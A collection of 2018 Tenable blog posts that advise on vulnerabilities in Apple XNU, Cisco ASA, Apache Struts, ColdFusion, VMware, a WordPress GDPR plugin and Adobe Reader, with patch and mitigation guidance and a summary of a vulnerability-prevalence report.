A researcher has disclosed a buffer overflow vulnerability in Apple’s XNU operating system kernel that allows attackers on a local network to reboot Apple’s iOS and macOS devices and could potentially lead to remote code execution.

Background

On October 30, researcher Kevin Backhouse of Semmle published a blog on his discovery of a buffer overflow vulnerability in Apple’s XNU operating system kernel (CVE-2018-4407). Specifically, the vulnerability exists in the networking code for XNU for how packets are handled. The vulnerability affects OS X, macOS and iOS devices. Backhouse released a proof of concept (PoC) video demonstrating how this vulnerability can be used to crash macOS and iOS devices on a local network.

The PoC has been withheld to allow time for Apple users to upgrade their devices.

Impact assessment

According to Backhouse, this vulnerability affects iOS devices running iOS 11 and earlier. It also affects legacy devices running Apple’s OS X operating system from El Capitan and earlier, as well as macOS Sierra and High Sierra. The vulnerability was reported to Apple in August 2018 and it had been patched in iOS 12 and macOS Mojave.

Vulnerability details

This vulnerability allows a local network attacker to send a specially crafted Internet Protocol (IP) packet to unsuspecting Apple users that triggers a device reboot (or denial of service). While not demonstrated, Backhouse reports that this vulnerability could lead to remote code execution because an attacker can “control the size and content of the heap buffer overflow.” Additionally, he asserts, “the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you[...] It also doesn't matter what software you are running on the device - the malicious packet will still trigger the vulnerability even if you don't have any ports open.”

Urgently required actions

Apple users should upgrade to the latest versions of their respective operating systems. In this case, both iOS 12 and macOS Mojave (10.14) have addressed this vulnerability. Apple has also addressed this vulnerability in macOS Sierra and macOS High Sierra.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.

Get more information

• Kernel RCE caused by buffer overflow in Apple's ICMP packet-handling code (CVE-2018-4407)
• Video of PoC for CVE-2018-4407
• About the security content of iOS 12
• About the security content of macOS Mojave 10.14
• Security Update 2018-001 High Sierra, Security Update 2018-005 Sierra

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Cisco advised that the Adaptive Security Appliance (ASA) and Firepower systems are being exploited in the wild with a Session Initiation Protocol (SIP) vulnerability. There is currently no patch.

Background

Cisco posted an advisory today warning users that their popular Adaptive Security Appliance (ASA) and Firepower Threat Defense Software are vulnerable to a Session Initiation Protocol (SIP) handling bug currently being exploited in the wild. As of November 1 10:00 a.m. (EST), there is no patch or workaround available. In the meantime, Cisco has provided mitigation guidance.

Impact assessment

According to Cisco: “While the vulnerability described in this advisory is being actively exploited, the output of show conn port 5060 will show a large number of incomplete SIP connections and the output of show processes cpu-usage non-zero sorted will show a high CPU utilization. Successful exploitation of this vulnerability can also result in a denial of service (DOS) causing the affected device to crash and reload. After the device boots up again, the output of show crashinfo will show an unknown abort of the DATAPATH thread.”

Vulnerability details

The vulnerability is reportedly caused by improper SIP inspection. SIP is a common protocol used for voice over IP (VoIP). It is also used for file transfer, instant messaging, video conferencing and streaming media. SIP can be run over TCP, UDP or other networking protocols.The following Cisco devices are listed as affected:

• 3000 Series Industrial Security Appliance (ISA)
• ASA 5500-X Series Next-Generation Firewalls
• ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
• Adaptive Security Virtual Appliance (ASAv)
• Firepower 2100 Series Security Appliance
• Firepower 4100 Series Security Appliance
• Firepower 9300 ASA Security Module
• FTD Virtual (FTDv)

The vulnerability reportedly does not impact the following devices:

• ASA 1000V Cloud Firewall
• ASA 5500 Series Adaptive Security Appliances

Urgently required actions

Due to the fact this issue is reportedly being exploited in the wild and the “default on” nature of SIP inspection, users are urged to apply the mitigations provided by Cisco ASAP. Several mitigating controls are provided:

• Disabling SIP inspection (on by default): Disabling SIP inspection will completely close the attack vector for this vulnerability. However, it may not be suitable for everyone. In particular, disabling SIP inspection would break SIP connections if either Network Address Translation (NAT) is applied to SIP traffic or if not all ports required for SIP communication are opened via ACL. To disable SIP inspection, configure the following:

Cisco ASA Software and Cisco FTD Software Releases 6.2 and later (in FTD 6.2 and later use Cisco FMC to add the following via FlexConfig policy):

<code>

policy-map global_policy

class inspection_default

no inspect sip

Cisco FTD Software Releases prior to 6.2:

configure inspection sip disable

</code>

Additionally, the mitigations below are described in the advisory:

• Blocking the attacking host
• Filtering on Sent-by Address of 0.0.0.0, as that address has reportedly been used by attackers in ongoing exploitation

Identifying affected systems

Tenable is actively monitoring for any updates provided by Cisco and will provide plugin coverage as soon as it becomes available.

Get more information

• Cisco Advisory

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Apache Software Foundation announces a security update for Apache Struts to address a vulnerability in the Commons FileUpload library that could lead to remote code execution. We recommend updating now.

Background

On November 5, the Apache Software Foundation (ASF) published a security announcement to Apache Struts project administrators about CVE-2016-1000031, a vulnerability in the Commons FileUpload library originally reported by Tenable’s Research team in 2016. This library ships as part of Apache Struts 2 and is used as the default mechanism for file uploads. The ASF reports that Apache Struts 2.3.36 and prior are vulnerable. A remote attacker could use this vulnerability to gain remote code execution on publicly accessible websites running a vulnerable version of Apache Struts.

Vulnerability details

For details about this vulnerability, please review the Tenable Research Advisory for the Apache Commons FileUpload DiskFileItem File Manipulation Remote Code Execution (LOBSTER).

Urgently required actions

The ASF confirms that Apache Struts version 2.5.12 and above include the patched version of the commons-fileupload library, version 1.3.3. If possible, Apache Struts project administrators should upgrade to 2.5.12 and above. The ASF also notes that the patched version of the commons-fileupload library can be dropped into projects that have already been deployed by simply replacing the JAR file in the WEB-INF/lib path with the fixed version. Maven based Struts projects can address this vulnerability by adding in the following dependency:

<dependency>
  <groupId>commons-fileupload</groupId>
  <artifactId>commons-fileupload</artifactId>
  <version>1.3.3</version></dependency>

Identifying affected systems

A list of Nessus plugins to identify this vulnerability can be found here.

Get more information:

• Immediately upgrade commons-fileupload to version 1.3.3 when running Struts 2.3.36 or prior
• CVE-2016-1000031 Detail
• Tenable Research Advisory: Apache Commons FileUpload DiskFileItem File Manipulation Remote Code Execution

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

<p>The <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a>, released today by Tenable Research, provides an overview of current vulnerability disclosure trends and insights into real-world vulnerability demographics in enterprise environments. Here are three highlights from the report.</p>
<p>Because vulnerabilities are the fulcrum for everything we do at Tenable Research, the state of the vulnerability ecosystem is of particular interest to us.</p>
<p>To gain a full-spectrum view of the vulnerability ecosystem, you must first consider the developments and trends in vulnerability research and disclosure. This aspect is well studied, with many vendors and industry organizations regularly publishing commentary on trends in the Common Vulnerabilities and Exposures (CVE) and National Vulnerability Database (NVD). Knowing about the diversity, growth and evolution of vulnerabilities and common weaknesses gives us a feel for what is potentially out there, but provides only descriptive information. CVE and NVD tell you which vulnerabilities exist in theory - not in practice - and give no insight into the live, active population of vulnerabilities.</p>
<p>Understanding what vulnerabilities really exist requires insight into end-user behavior and telemetry, something unique to Tenable Research. We know what the live vulnerability population is. Out of the 107,710 distinct CVEs published since 1999, 22,625 (23 percent) actually exist in enterprise environments. That’s the true vulnerability ecosystem. The remainder have gone extinct or are hiding in the digital equivalent of Lake Vostok.</p>
<p>We are seeing continuing growth in the relative and absolute numbers of vulnerabilities. In 2017, 15,038 new vulnerabilities were published versus 9,837 in 2016, an increase of 53 percent. Comparing the first half of 2018 to the first half of 2017, we are currently on track for an increase of 27 percent, or a projected 18,000–19,000 new vulnerabilities this year. Realistically, our projection is probably conservative.</p>
<p>Effective threat and vulnerability management is now dictated by scale and complexity, volume and velocity - the scale and complexity of distributed, mobile and heterogeneous networks and users, the volume of resulting vulnerabilities, and the velocity with which new vulnerabilities are disclosed and exploited in the wild. More than ever, this requires actionable intelligence. We’re not exempt from this requirement here at Tenable Research, and we practice what we preach. The result: our <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a>. And because we believe in full disclosure and intelligence sharing, we are sharing it with our community.</p>
<p>You can grab a copy of the report <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">here</a>. In the meantime, I’d like to discuss three things that really stood out to us in Tenable Research:</p>
<h2>CVSS version 3 has aggravated the prioritization problem</h2>
<p>CVSS version 3 was introduced in 2015, and was intended to resolve some limitations in how version 2 assessed the impact of a vulnerability, amongst other changes. While version 3 scores are rarely available for older vulnerabilities, most vulnerabilities from 2016 onwards have begun receiving CVSSv3 scores. Feedback from the field and third-party reports have noted weaknesses in version 3 since its release. Our own analysis supports the critique, showing that CVSSv3 scores the majority of vulnerabilities as High and Critical.</p>
<p>As Figure 1 shows, CVSSv2 scored 31 percent of CVEs as High severity, versus 60 percent with High or Critical severity under CVSSv3.</p>
<p>Used on its own, CVSSv3 aggravates, rather than resolves, the prioritization challenge. Before this is interpreted as an endorsement of using CVSSv2, the original cause for adopting version 3 still remains - version 2 does not reliably reflect the risk that a vulnerability represents to other system components.</p>
<p><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/VulnIntelligence-CVEs-Overall.jpg" width="940" height="423" alt="Tenable Vulnerability Intelligence Report - CVEs overall – CVSS severity distributions" /></p>
<p><i>Figure 1: CVEs overall – CVSS severity distributions</i></p>
<h2>Legacy vulnerabilities still represent a residual risk</h2>
<p>In the second section of the report, we look at vulnerability prevalence - vulnerabilities that actually exist in enterprise environments - by analyzing the data from over 900,000 vulnerability assessment scans conducted between March and August 2018. We also drilled down into Web Browser and Application vulnerabilities, due to their inclusion in Exploit Kits, and other client-side attacks. What immediately stood out for us? Many of the vulnerabilities enterprises are detecting are in old or legacy software.</p>
<p>Figure 2 clearly shows the concentration of Firefox vulnerabilities from 2012 to 2017, peaking in 2015. Firefox has just over 10 percent of the web browser market share, but actually represented 53 percent of all High severity vulnerabilities in our data set. Firefox vulnerabilities are not being remediated.</p>
<p><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/Report-VulnIntelligence-Fig17.jpg" width="2182" height="501" alt="" /></p>
<p><i>Figure 2: Distinct High severity Web Browser CVEs prevalent in enterprise environments</i></p>
<p>As you can see in Figure 3, there is a similar phenomena for Microsoft Office and Oracle Java.</p>
<p><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/Report-VulnIntelligence-Fig23.jpg" width="2182" height="501" alt="" /></p>
<p><i>Figure 3: Distinct High severity Application CVEs prevalent in enterprise environments</i></p>
<p>There may be reasonable business justifications for retaining legacy systems and software. Java, especially, is known to cause challenges due to version dependencies. In those cases, the vulnerable systems can be segmented, or the software can even be installed on a virtual system and only started on an as-needed basis. Without a legitimate business reason though, these applications represent an avoidable residual risk.</p>
<h2>Exploitability is insufficiently used as a prioritization criteria</h2>
<p>When a vulnerability is first discovered, it’s a hypothetical risk. With the publication of an exploit, that vulnerability becomes a potential risk if it’s present on your system. Our research shows that for seven percent of disclosed vulnerabilities in 2017, public exploits were available. While that still left enterprises with up to 751 vulnerabilities to prioritize, it’s better than the volume they would have been left with by using CVSSv3 alone to prioritize. That approach would have given them 8,120 vulnerabilities (54 percent of the total) with a CVSSv3 score of 7.0 or higher to prioritize. Even narrowing this to only CVSSv3 9.0-10, “Critical” would have left 1,804 vulnerabilities (12 percent).</p>
<p>The information is available to most end users in their VA solution, and is automatically operationalized by correlating exploitability data with detected vulnerabilities.</p>
<p>When we analyzed the 609 distinct High severity application vulnerabilities in our data set, we discovered the majority of missing security updates fixed vulnerabilities for which public exploits are available. As you can see in Figure 4, public exploits are available for a whopping 79 percent of the missing security updates that address High severity Adobe Flash vulnerabilities and were detected as missing by enterprises in their environments. For Adobe PDF, the figure is 96 percent. Considering that Flash-enabled content on the internet has steeply declined and will be unsupported as of 2020, there is little value in keeping Flash installed. It does, however, represent a huge residual risk. The lowest percentage in any application group of missing security updates addressing a vulnerability with a public exploit available in the dataset was 41 percent.</p>
<p style="text-align: center;"><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/AdobeFlashExploits.jpg" width="287" height="370" alt="" /></p>
<p><i>Figure 4: Public exploits are available for a whopping 79 percent of the missing security updates that address High severity Adobe Flash vulnerabilities<i></i></i></p>
<p>Considering how useful exploitability is as a criteria to evaluate whether a vulnerability represents an acute risk, and that the information is widely available, this finding surprised us. There is definitely a need for raising awareness in the community for this simple, but effective prioritization criteria.</p>
<p>These are just three of the key findings that caught our attention. You can read the full report <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">here<...
<p><b>Learn More:</b></p>
<ul>
<li>Download the <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a>.</li>
<li>Read the eBook: <a href="https://www.tenable.com/whitepapers/how-to-prioritize-cybersecurity-risk... to Prioritize Cybersecurity Risk: A Primer for CISOs</a>.</li>
<li>Read our exec blog: <a href="https://www.tenable.com/blog/vulnerability-intelligence-report-a-risk-ce... Intelligence Report: A Risk-Centric Approach To Prioritization</a>.</li>
</ul>

<p>Tenable Research set out to provide organizations with the real-world data they need to take a risk-centric approach to vulnerability management.</p>
<p>Insight into the true state of cyber exposure - how defenders are actually acting - not how they think or say they are, has so far been difficult to discern.</p>
<p>The newly released <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a> provides an overview of current vulnerability disclosure trends and insights into real-world vulnerability demographics in enterprise environments. The report analyzes vulnerability prevalence in the wild, based on the number of affected enterprises, to highlight vulnerabilities that security practitioners are dealing with in practice, not just in theory.</p>
<p>With 61% of all vulnerabilities detected in enterprise environments rated as a High severity, cybersecurity teams are challenged to determine which vulnerabilities truly represent a risk. They need to prioritize the most critical vulnerabilities to maximize limited remediation resources. When everything is urgent, triage fails.</p>
<h2>Better prioritization is critical</h2>
<p>In order to prioritize, organizations first need to better understand the actual, not theoretical, impact of vulnerabilities. As a prioritization metric, CVSS has its shortcomings. It lacks granularity at scale and volume, as the majority of vulnerabilities are classified as High or Critical severity. The shift from CVSSv2 to CVSSv3 only adds to the problem, as the majority of vulnerabilities are now registered as either 'High' or 'Critical.'</p>
<p>Common sense dictates that if everything seems important, then nothing is – and a better way of prioritization is needed. Such insight needs to incorporate context, such as threat intelligence, so organizations can prioritize vulnerabilities based on actual threats 'in the wild.'</p>
<p>Tenable Research set out to provide such insight in the <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report </a>.</p>
<p>The report analyzes vulnerability prevalence, based on the number of maximum affected enterprises on a single day, to highlight the vulnerabilities security practitioners are dealing with on a daily basis.</p>
<p>On average, an enterprise is finding 870 CVEs across 960 assets every single day. This means prioritization methodologies based on remediating only High severity CVEs still leave the average enterprise with more than 548 vulnerabilities per day to assess and prioritize, often on multiple systems.</p>
<p>This means prioritization methodologies based on remediating only critical CVEs will still leave the average enterprise with over a hundred vulnerabilities per day to prioritize per patch, often on multiple systems. Adding to the problem is the fact that vulnerabilities not defined as ‘critical’ (i.e., having a CVSS score lower than 9), can have a catastrophic effect – for example WannaCry exploited a vulnerability with a score below 9.0 (the vuln was listed as 8.5).</p>
<p>This study confirms managing vulnerabilities is a challenge of scale, velocity and volume. It is not just an engineering challenge, but requires a risk-centric view in order to prioritize thousands of vulnerabilities that superficially all seem the same.</p>
<p>The report introduces the Top 20 Vulnerability Chart – providing insight into the most prevalent vulnerabilities that exist across different technologies in the enterprises. The chart utilizes real-world telemetry data to reveal which vulnerabilities are actually present in enterprise environments and subsequently represent the greatest true risk. Organizations can use this information to put into perspective their own list of vulnerabilities as compared to the larger population.</p>
<h2>Key findings</h2>
<ul>
<li><i>The haystack is getting bigger</i> – 15,038 new vulnerabilities were published in 2017 in total, versus 9,837 in 2016, an increase of 53%. 2018 is on track for 18,000-19,000 new vulnerabilities. Almost two thirds (61%) of the vulnerabilities enterprises are finding in their environments have a CVSSv2 severity of High (7.0-10.0).</li>
<li><i>But there are few needles</i> - Public exploits are available for just 7% of all vulnerabilities. The reality is that, for most vulnerabilities, a working exploit is never developed and of those an even smaller subset are actively weaponized and employed by threat actors. Finding and fixing the 7% is critical to improving an organization’s cyber exposure.</li>
</ul>
<p>At current projections, more than 1,500 exploited vulnerabilities will be published in 2018, or just over 28 exploited vulnerabilities every week. Better insight is a necessity, not a ‘nice to have.’ Download the Vulnerability Intelligence Report <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">here</a> to gain the insight you need to begin building a risk-based approach to prioritization.</p>
<p><b>Learn More:</b></p>
<ul>
<li>Download the <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a>.</li>
<li>Read the eBook: <a href="https://www.tenable.com/whitepapers/how-to-prioritize-cybersecurity-risk... to Prioritize Cybersecurity Risk: A Primer for CISOs</a>.</li>
<li>Read our tech blog: <a href="https://tenable.com/blog/three-vulnerability-intelligence-insights-worth... Vulnerability Intelligence Insights Worth Your Attention</a></li>
</ul>

<p>Researchers at Volexity have identified multiple groups exploiting CVE-2018-15961 in unpatched, web-facing Adobe ColdFusion servers. Users are urged to upgrade to the latest version of ColdFusion.</p>
<h2>Background</h2>
<p>On November 8, <a href="https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-pa... reported Advanced Persistent Threat (APT) and hacktivist groups have been targeting web-facing instances of Adobe ColdFusion that haven’t patched for <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15961">CVE-2018-15961</a>. Adobe released <a href="https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html">APS... to address the vulnerability on September 11, 2018.</p>
<h2>Impact assessment</h2>
<p>The researchers at Volexity identified two separate and unrelated attacks on a number of web-facing ColdFusion servers: a hacktivist group seeking to deface websites; and an APT attempting to hijack ColdFusion servers.</p>
<p>Pro-ISIS hacktivist AnoaGhost of “Typical Idiot Security” has been seen leaving defacing HTML index files on numerous sites that Volexity has identified as “educational institutions, state government, health research, humanitarian aid organizations, and more.”</p>
<p>In addition, a separate APT campaign was identified using the JavaServer Pages (JSP) version of China Chopper, a malicious web shell, to exploit <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15961">CVE-2018-15961</a>. Exploitation of this vulnerability can lead to remote code execution on the ColdFusion server. An attacker can take full control of a target once China Chopper has been uploaded as shown in the example below:</p>
<p></p>
<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/CChopper.png" width="856" height="350" alt="An attacker can take full control of a target once China Chopper has been uploaded as shown in this example." />
<p><i>Source: <a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-c...
<h2>Incident details</h2>
<p>The exact impact the APT group has had on any servers that they’ve potentially attacked is unknown, but the possibility of organizational attack is likely.</p>
<p>As far as the hacktivists are concerned, Volexity reports “Several of the affected websites contained an HTML index file that purported to be from the hacktivist group TYPICAL IDIOT SECURITY.”</p>
<p>The file in question appears as follows:</span><b style="font-weight: normal;" id="docs-internal-guid-1835780c-7fff-13cd-3e97-5e4847edf603"><br /></b></p>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border: none; border-collapse: collapse; width: 468pt;"><colgroup><col width="*" /></colgroup>
<tbody>
<tr style="height: 0pt;">
<td style="vertical-align: top; padding: 5pt 5pt 5pt 5pt; border: solid #000000 1pt;">
<p dir="ltr" style="line-height: 1.2; margin-top: 0pt; margin-bottom: 0pt; text-align: center;"><span style="font-size: 12pt; font-family: Arial; color: #333333; background-color: transparent; font-weight: 400; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hacked by AnoaGhost – Typical Idiot Security</span></p>
<p dir="ltr" style="line-height: 1.2; margin-top: 0pt; margin-bottom: 0pt; text-align: center;"><span style="font-size: 12pt; font-family: Arial; color: #333333; background-color: transparent; font-weight: 400; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">#together laugh in ur security since 2k17#</span></p>
<p dir="ltr" style="line-height: 1.2; margin-top: 0pt; margin-bottom: 0pt; text-align: center;"><span style="font-size: 12pt; font-family: Arial; color: #333333; background-color: transparent; font-weight: 400; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We are:~•Khunerable – SPEEDY-03 – PYS404 – Mirav – Grac3 – AnoaGhost – Jje Incovers – Panataran – magelangGetar – Kersen.id•</span></p>
</td>
</tr>
</tbody>
</table>
</div>
<p></p>
<h2>Urgently required actions</h2>
<p>To protect against these attacks, we highly recommend upgrading to the latest version of ColdFusion, which can be done from the administrator panel under Server Update &gt; Updates &gt; Settings.</p>
<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/cf-updates-1024x438.png" width="1024" height="438" alt="we highly recommend upgrading to the latest version of ColdFusion." />
<p><i>Source: <a href="https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-pa...
<h2>Identifying affected systems </h2>
<p>A list of Nessus plugins to identify this vulnerability can be found <a href="https://www.tenable.com/plugins/search?q=%22APSB18-33%22&sort=&page=1">h...
<h2>Get more information</h2>
<ul><li><a href="https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-pa... Blog</a
</li>
<li><a href="https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html">Adobe Security Advisory</a>
</li>
</ul>
<p><b>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management.</a></p>

<p>VMware issued an advisory about two uninitialized stack memory usage bugs and has released patches and updates for some versions of the affected software.</p>
<h2>Background</h2>
<p>On November 9, VMware published a security advisory to address a Guest-to-Host Escape vulnerability affecting VMware ESXi, Workstation and Fusion. The vulnerability was discovered and released by a security researcher at GeekPwn 2018, an annual security conference in Shanghai, China which took place in late October 2018. The researcher reported the vulnerability to VMware through GeekPwn.</p>
<p><script type="text/javascript" id="vidyard_embed_code_LSmcyWYaoeLA58zsiMv2JA" src="//play.vidyard.com/LSmcyWYaoeLA58zsiMv2JA.js?v=3.1.1&type=inline"></script></p>
<p><i>Source: <a href="https://twitter.com/ChaitinTech/status/1057526019127676929">@ChaitinTech on Twitter</a>.</i></p>
<h2>Vulnerability details</h2>
<p>According to <a href="https://www.vmware.com/security/advisories/VMSA-2018-0027.html">VMware’s Security Advisory</a>, Zhangyanyu of <a href="https://www.chaitin.cn/en/">Chaitin Tech</a> reported two uninitialized stack memory usage bugs (CVE-2018-6981 and CVE-2018-6982) in the vmxnet3 virtual network adapter used in VMware. VMware notes that the vulnerability does not affect non-vmxnet3 virtual network adapters.</p>
<p>Exploitation of CVE-2018-6981 can lead to a guest-to-host escape, allowing the guest to execute code on the host, while exploitation of CVE-2018-6982 can lead to information disclosure from host to guest. In a tweet that includes <a href="https://twitter.com/ChaitinTech/status/1057526019127676929">a video demonstration of the exploit</a>, Chaitin Tech asserts that this is the first time that anyone has escaped VMware EXSi and obtained a root shell on the host.</p>
<h2>Urgently required actions</h2>
<p>VMware’s Security Advisory includes patch availability details for consumers and businesses. Tenable’s Security Response team strongly encourages patching VMware ESXi versions and upgrading VMware Workstation and VMware Fusion using the table below:</p>
<p><img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/vmware_patch_vers_0.PNG" width="753" height="798" alt="" /></p>
<p>Source: <a href="https://www.vmware.com/security/advisories/VMSA-2018-0027.html">VMware Security Advisory </a></p>
<h2>Identifying affected systems</h2>
<p>A list of Tenable plugins to identify this vulnerability will appear <a href="https://www.tenable.com/plugins/search?q=cves%3A(%22CVE-2018-6981%22%20OR%20%22CVE-2018-6982%22)&amp;sort=&amp;page=1">here</a> as they’re released.</p>
<h2>Get more information</h2>
<ul>
<li><a href="https://www.vmware.com/security/advisories/VMSA-2018-0027.html">VMware Security Advisories: VMSA-2018-0027</a></li>
<li><a href="https://twitter.com/ChaitinTech/status/1057526019127676929">Video Demo of Guest-to-Host Escape by Chaitin Tech</a></li>
</ul>
<p><b><i>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management. </i></b></p>

<p>A privilege escalation flaw in WordPress’ popular WP GDPR Compliance plugin has led to exploitation of numerous WordPress sites. Site owners and administrators are encouraged to upgrade to the latest version of the affected plugin.</p>
<h2>Background</h2>
<p>WordPress plugin "<a href="https://wordpress.org/plugins/wp-gdpr-compliance/">WP GDPR Compliance</a>" versions before 1.4.3 are vulnerable to a privilege escalation attack. The attack doesn’t require authentication, and <a href="https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-w... reports that attackers have already exploited a number of sites. Exploited sites had their siteurls changed to "hxxp://erealitatea[.]net".</p>
<h2>Impact assessment</h2>
<p>As of Noon ET on November 12, a curated Google search shows approximately 7,600 sites with changed URLs to 'erealitatea[.]net'. The malicious site seems to have been taken down, but when administrators and users attempt to interact with their Wordpress sites, most of the sites will completely fail to load or crash when administrators attempt to edit. </p>
<h2>Vulnerability details </h2>
<p>The affected plugin normally handles access and delete requests that are required for GDPR compliance, but versions of this plugin before 1.4.3 don’t properly sanitize the 'save_setting' action. Because of that, an attacker can inject arbitrary commands, which get stored until the plugin reaches its 'do_action()' call.</p>
<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/WP%20GDPR%20Compliance%20Plugin.jpg" width="1000" height="859" alt="A privilege escalation flaw in WordPress’ popular WP GDPR Compliance plugin has led exploitation of numerous WordPress sites." />
<p><i>Source: <a href="https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-g...
<p>With these flaws, an attacker can gain administrative access to the site and make direct changes, including uploading malicious plugins for additional attacks.</p>
<h2>Urgently required actions.</h2>
<p>Administrators can manually edit the site’s database table <b>wp_options</b> to fix the URL if they’ve been attacked. The record <b>option_name</b> contains the “siteurl“ value. Admins can modify the domain in the <b>option_value</b> field.</p>
<p>With the URL fixed, the site should load normally, but we highly recommend checking for any malicious changes or uploads to the site, or restoring the site from an uncompromised backup. Once that step has been performed, site admins should immediately update the affected plugin to the latest version.</p>
<h2>Identifying affected systems</h2>
<p>A list of Tenable plugins to identify this vulnerability will appear <a href="https://www.tenable.com/plugins/search?q=cves%3A(%22CVE-2018-19207%22)&sort=&page=1">here</a> as they’re released.</p>
<h2>Get more information</h2>
<ul><li><a href="https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-w... Blog</a></li>
<li><a href="https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-g... technical blog</a></li>
<li><a href="https://wordpress.org/plugins/wp-gdpr-compliance/">WP GDPR Plugin page</a></li></ul></p>
<p><b><i>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management. </i></b></p>

Researchers have reported an incomplete fix for CVE-2018-4993, an NTLM credential leaking vulnerability that was supposed to be patched in May 2018. Adobe has now released a complete fix.

Background

On November 13, Adobe published its monthly security bulletins as part of its monthly release cycle in conjunction with Microsoft’s Patch Tuesday. The November security bulletins include a fix for a vulnerability that was believed to have been patched in May 2018’s security bulletins. However, security researchers at EdgeSpot discovered that the May 2018 fix was incomplete.

Vulnerability details

Researchers at Check Point Software Technologies originally reported this vulnerability to Adobe earlier in 2018. The vulnerability, CVE-2018-4993, is an information disclosure bug that leaks NT LAN Manager (NTLM) credentials through a feature of Portable Document Files (PDFs) that allows embedding remote documents and files. These credentials can be leaked when an attacker sends a specially crafted PDF file to a victim and includes the NTLM hash and challenge along with user and domain details.

Source: Checkpoint

Adobe reportedly patched this vulnerability in May 2018 as part of its security bulletin, APSB18-09. However, researchers at EdgeSpot, makers of an exploit detection service, determined that the May 2018 patch for CVE-2018-4993 was incomplete. The researchers examined two malicious PDF files (here and here) submitted to VirusTotal in May 2018 and determined the vulnerability still works using the latest version of Adobe Reader.

It appears that when Adobe issued their patch for this vulnerability in May 2018, it only patched one of two action types required when embedding remote documents and files. The two action types are:

• GoToR (GoToRemote)
• GoToE (GoToEmbedded)

EdgeSpot researchers say Adobe only patched GoToR and not GoToE based on the malicious PDF files they examined, both of which contained the GoToE action type. After reporting this to Adobe in early November, it was identified as a new CVE, CVE-2018-15979 and patched in Adobe’s November security bulletins.

Urgently required actions

Customers and users are strongly advised to upgrade to the latest versions of Adobe Acrobat and Acrobat Reader, which can be found here.

Identifying affected systems

A list of Nessus plugins to identify this vulnerability can be found here.

Get more information

• NTLM Credentials Theft via PDF Files
• The case of the unpatched variant of the PDF NTLM leaking vulnerability CVE-2018-4993
• Adobe Security Bulletin (APSB18-40)
• Adobe Security Bulletin (APSB18-09)

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

<p>The classes of vulnerabilities that brought us Meltdown and Spectre are not going away anytime soon. Here’s what you need to know about Speculative Execution vulnerabilities, with our guidance on steps you can take to reduce your risk.</p>
<p>Spectre and Meltdown generated a lot of confusion and discussion in the security world when they first hit the news. Understanding the risks associated with speculative execution vulnerabilities will help organizations prioritize and communicate effectively about their exposure. In this post, we present what it is known, how it affects companies and ways to stay ahead in the game.</p>
<h2>Start from the beginning…</h2>
<p>Speculative Execution is a technique used to enhance processor performance by anticipating which instructions will be required in advance. <a href="https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Ana... to Intel</a>, this helps minimize latency and extract greater parallelism, thereby leading to performance gains.The boost in performance comes with a tradeoff: results will be discarded if they are not needed. The technique is used by various microprocessor vendors including Intel, AMD and ARM.</p>
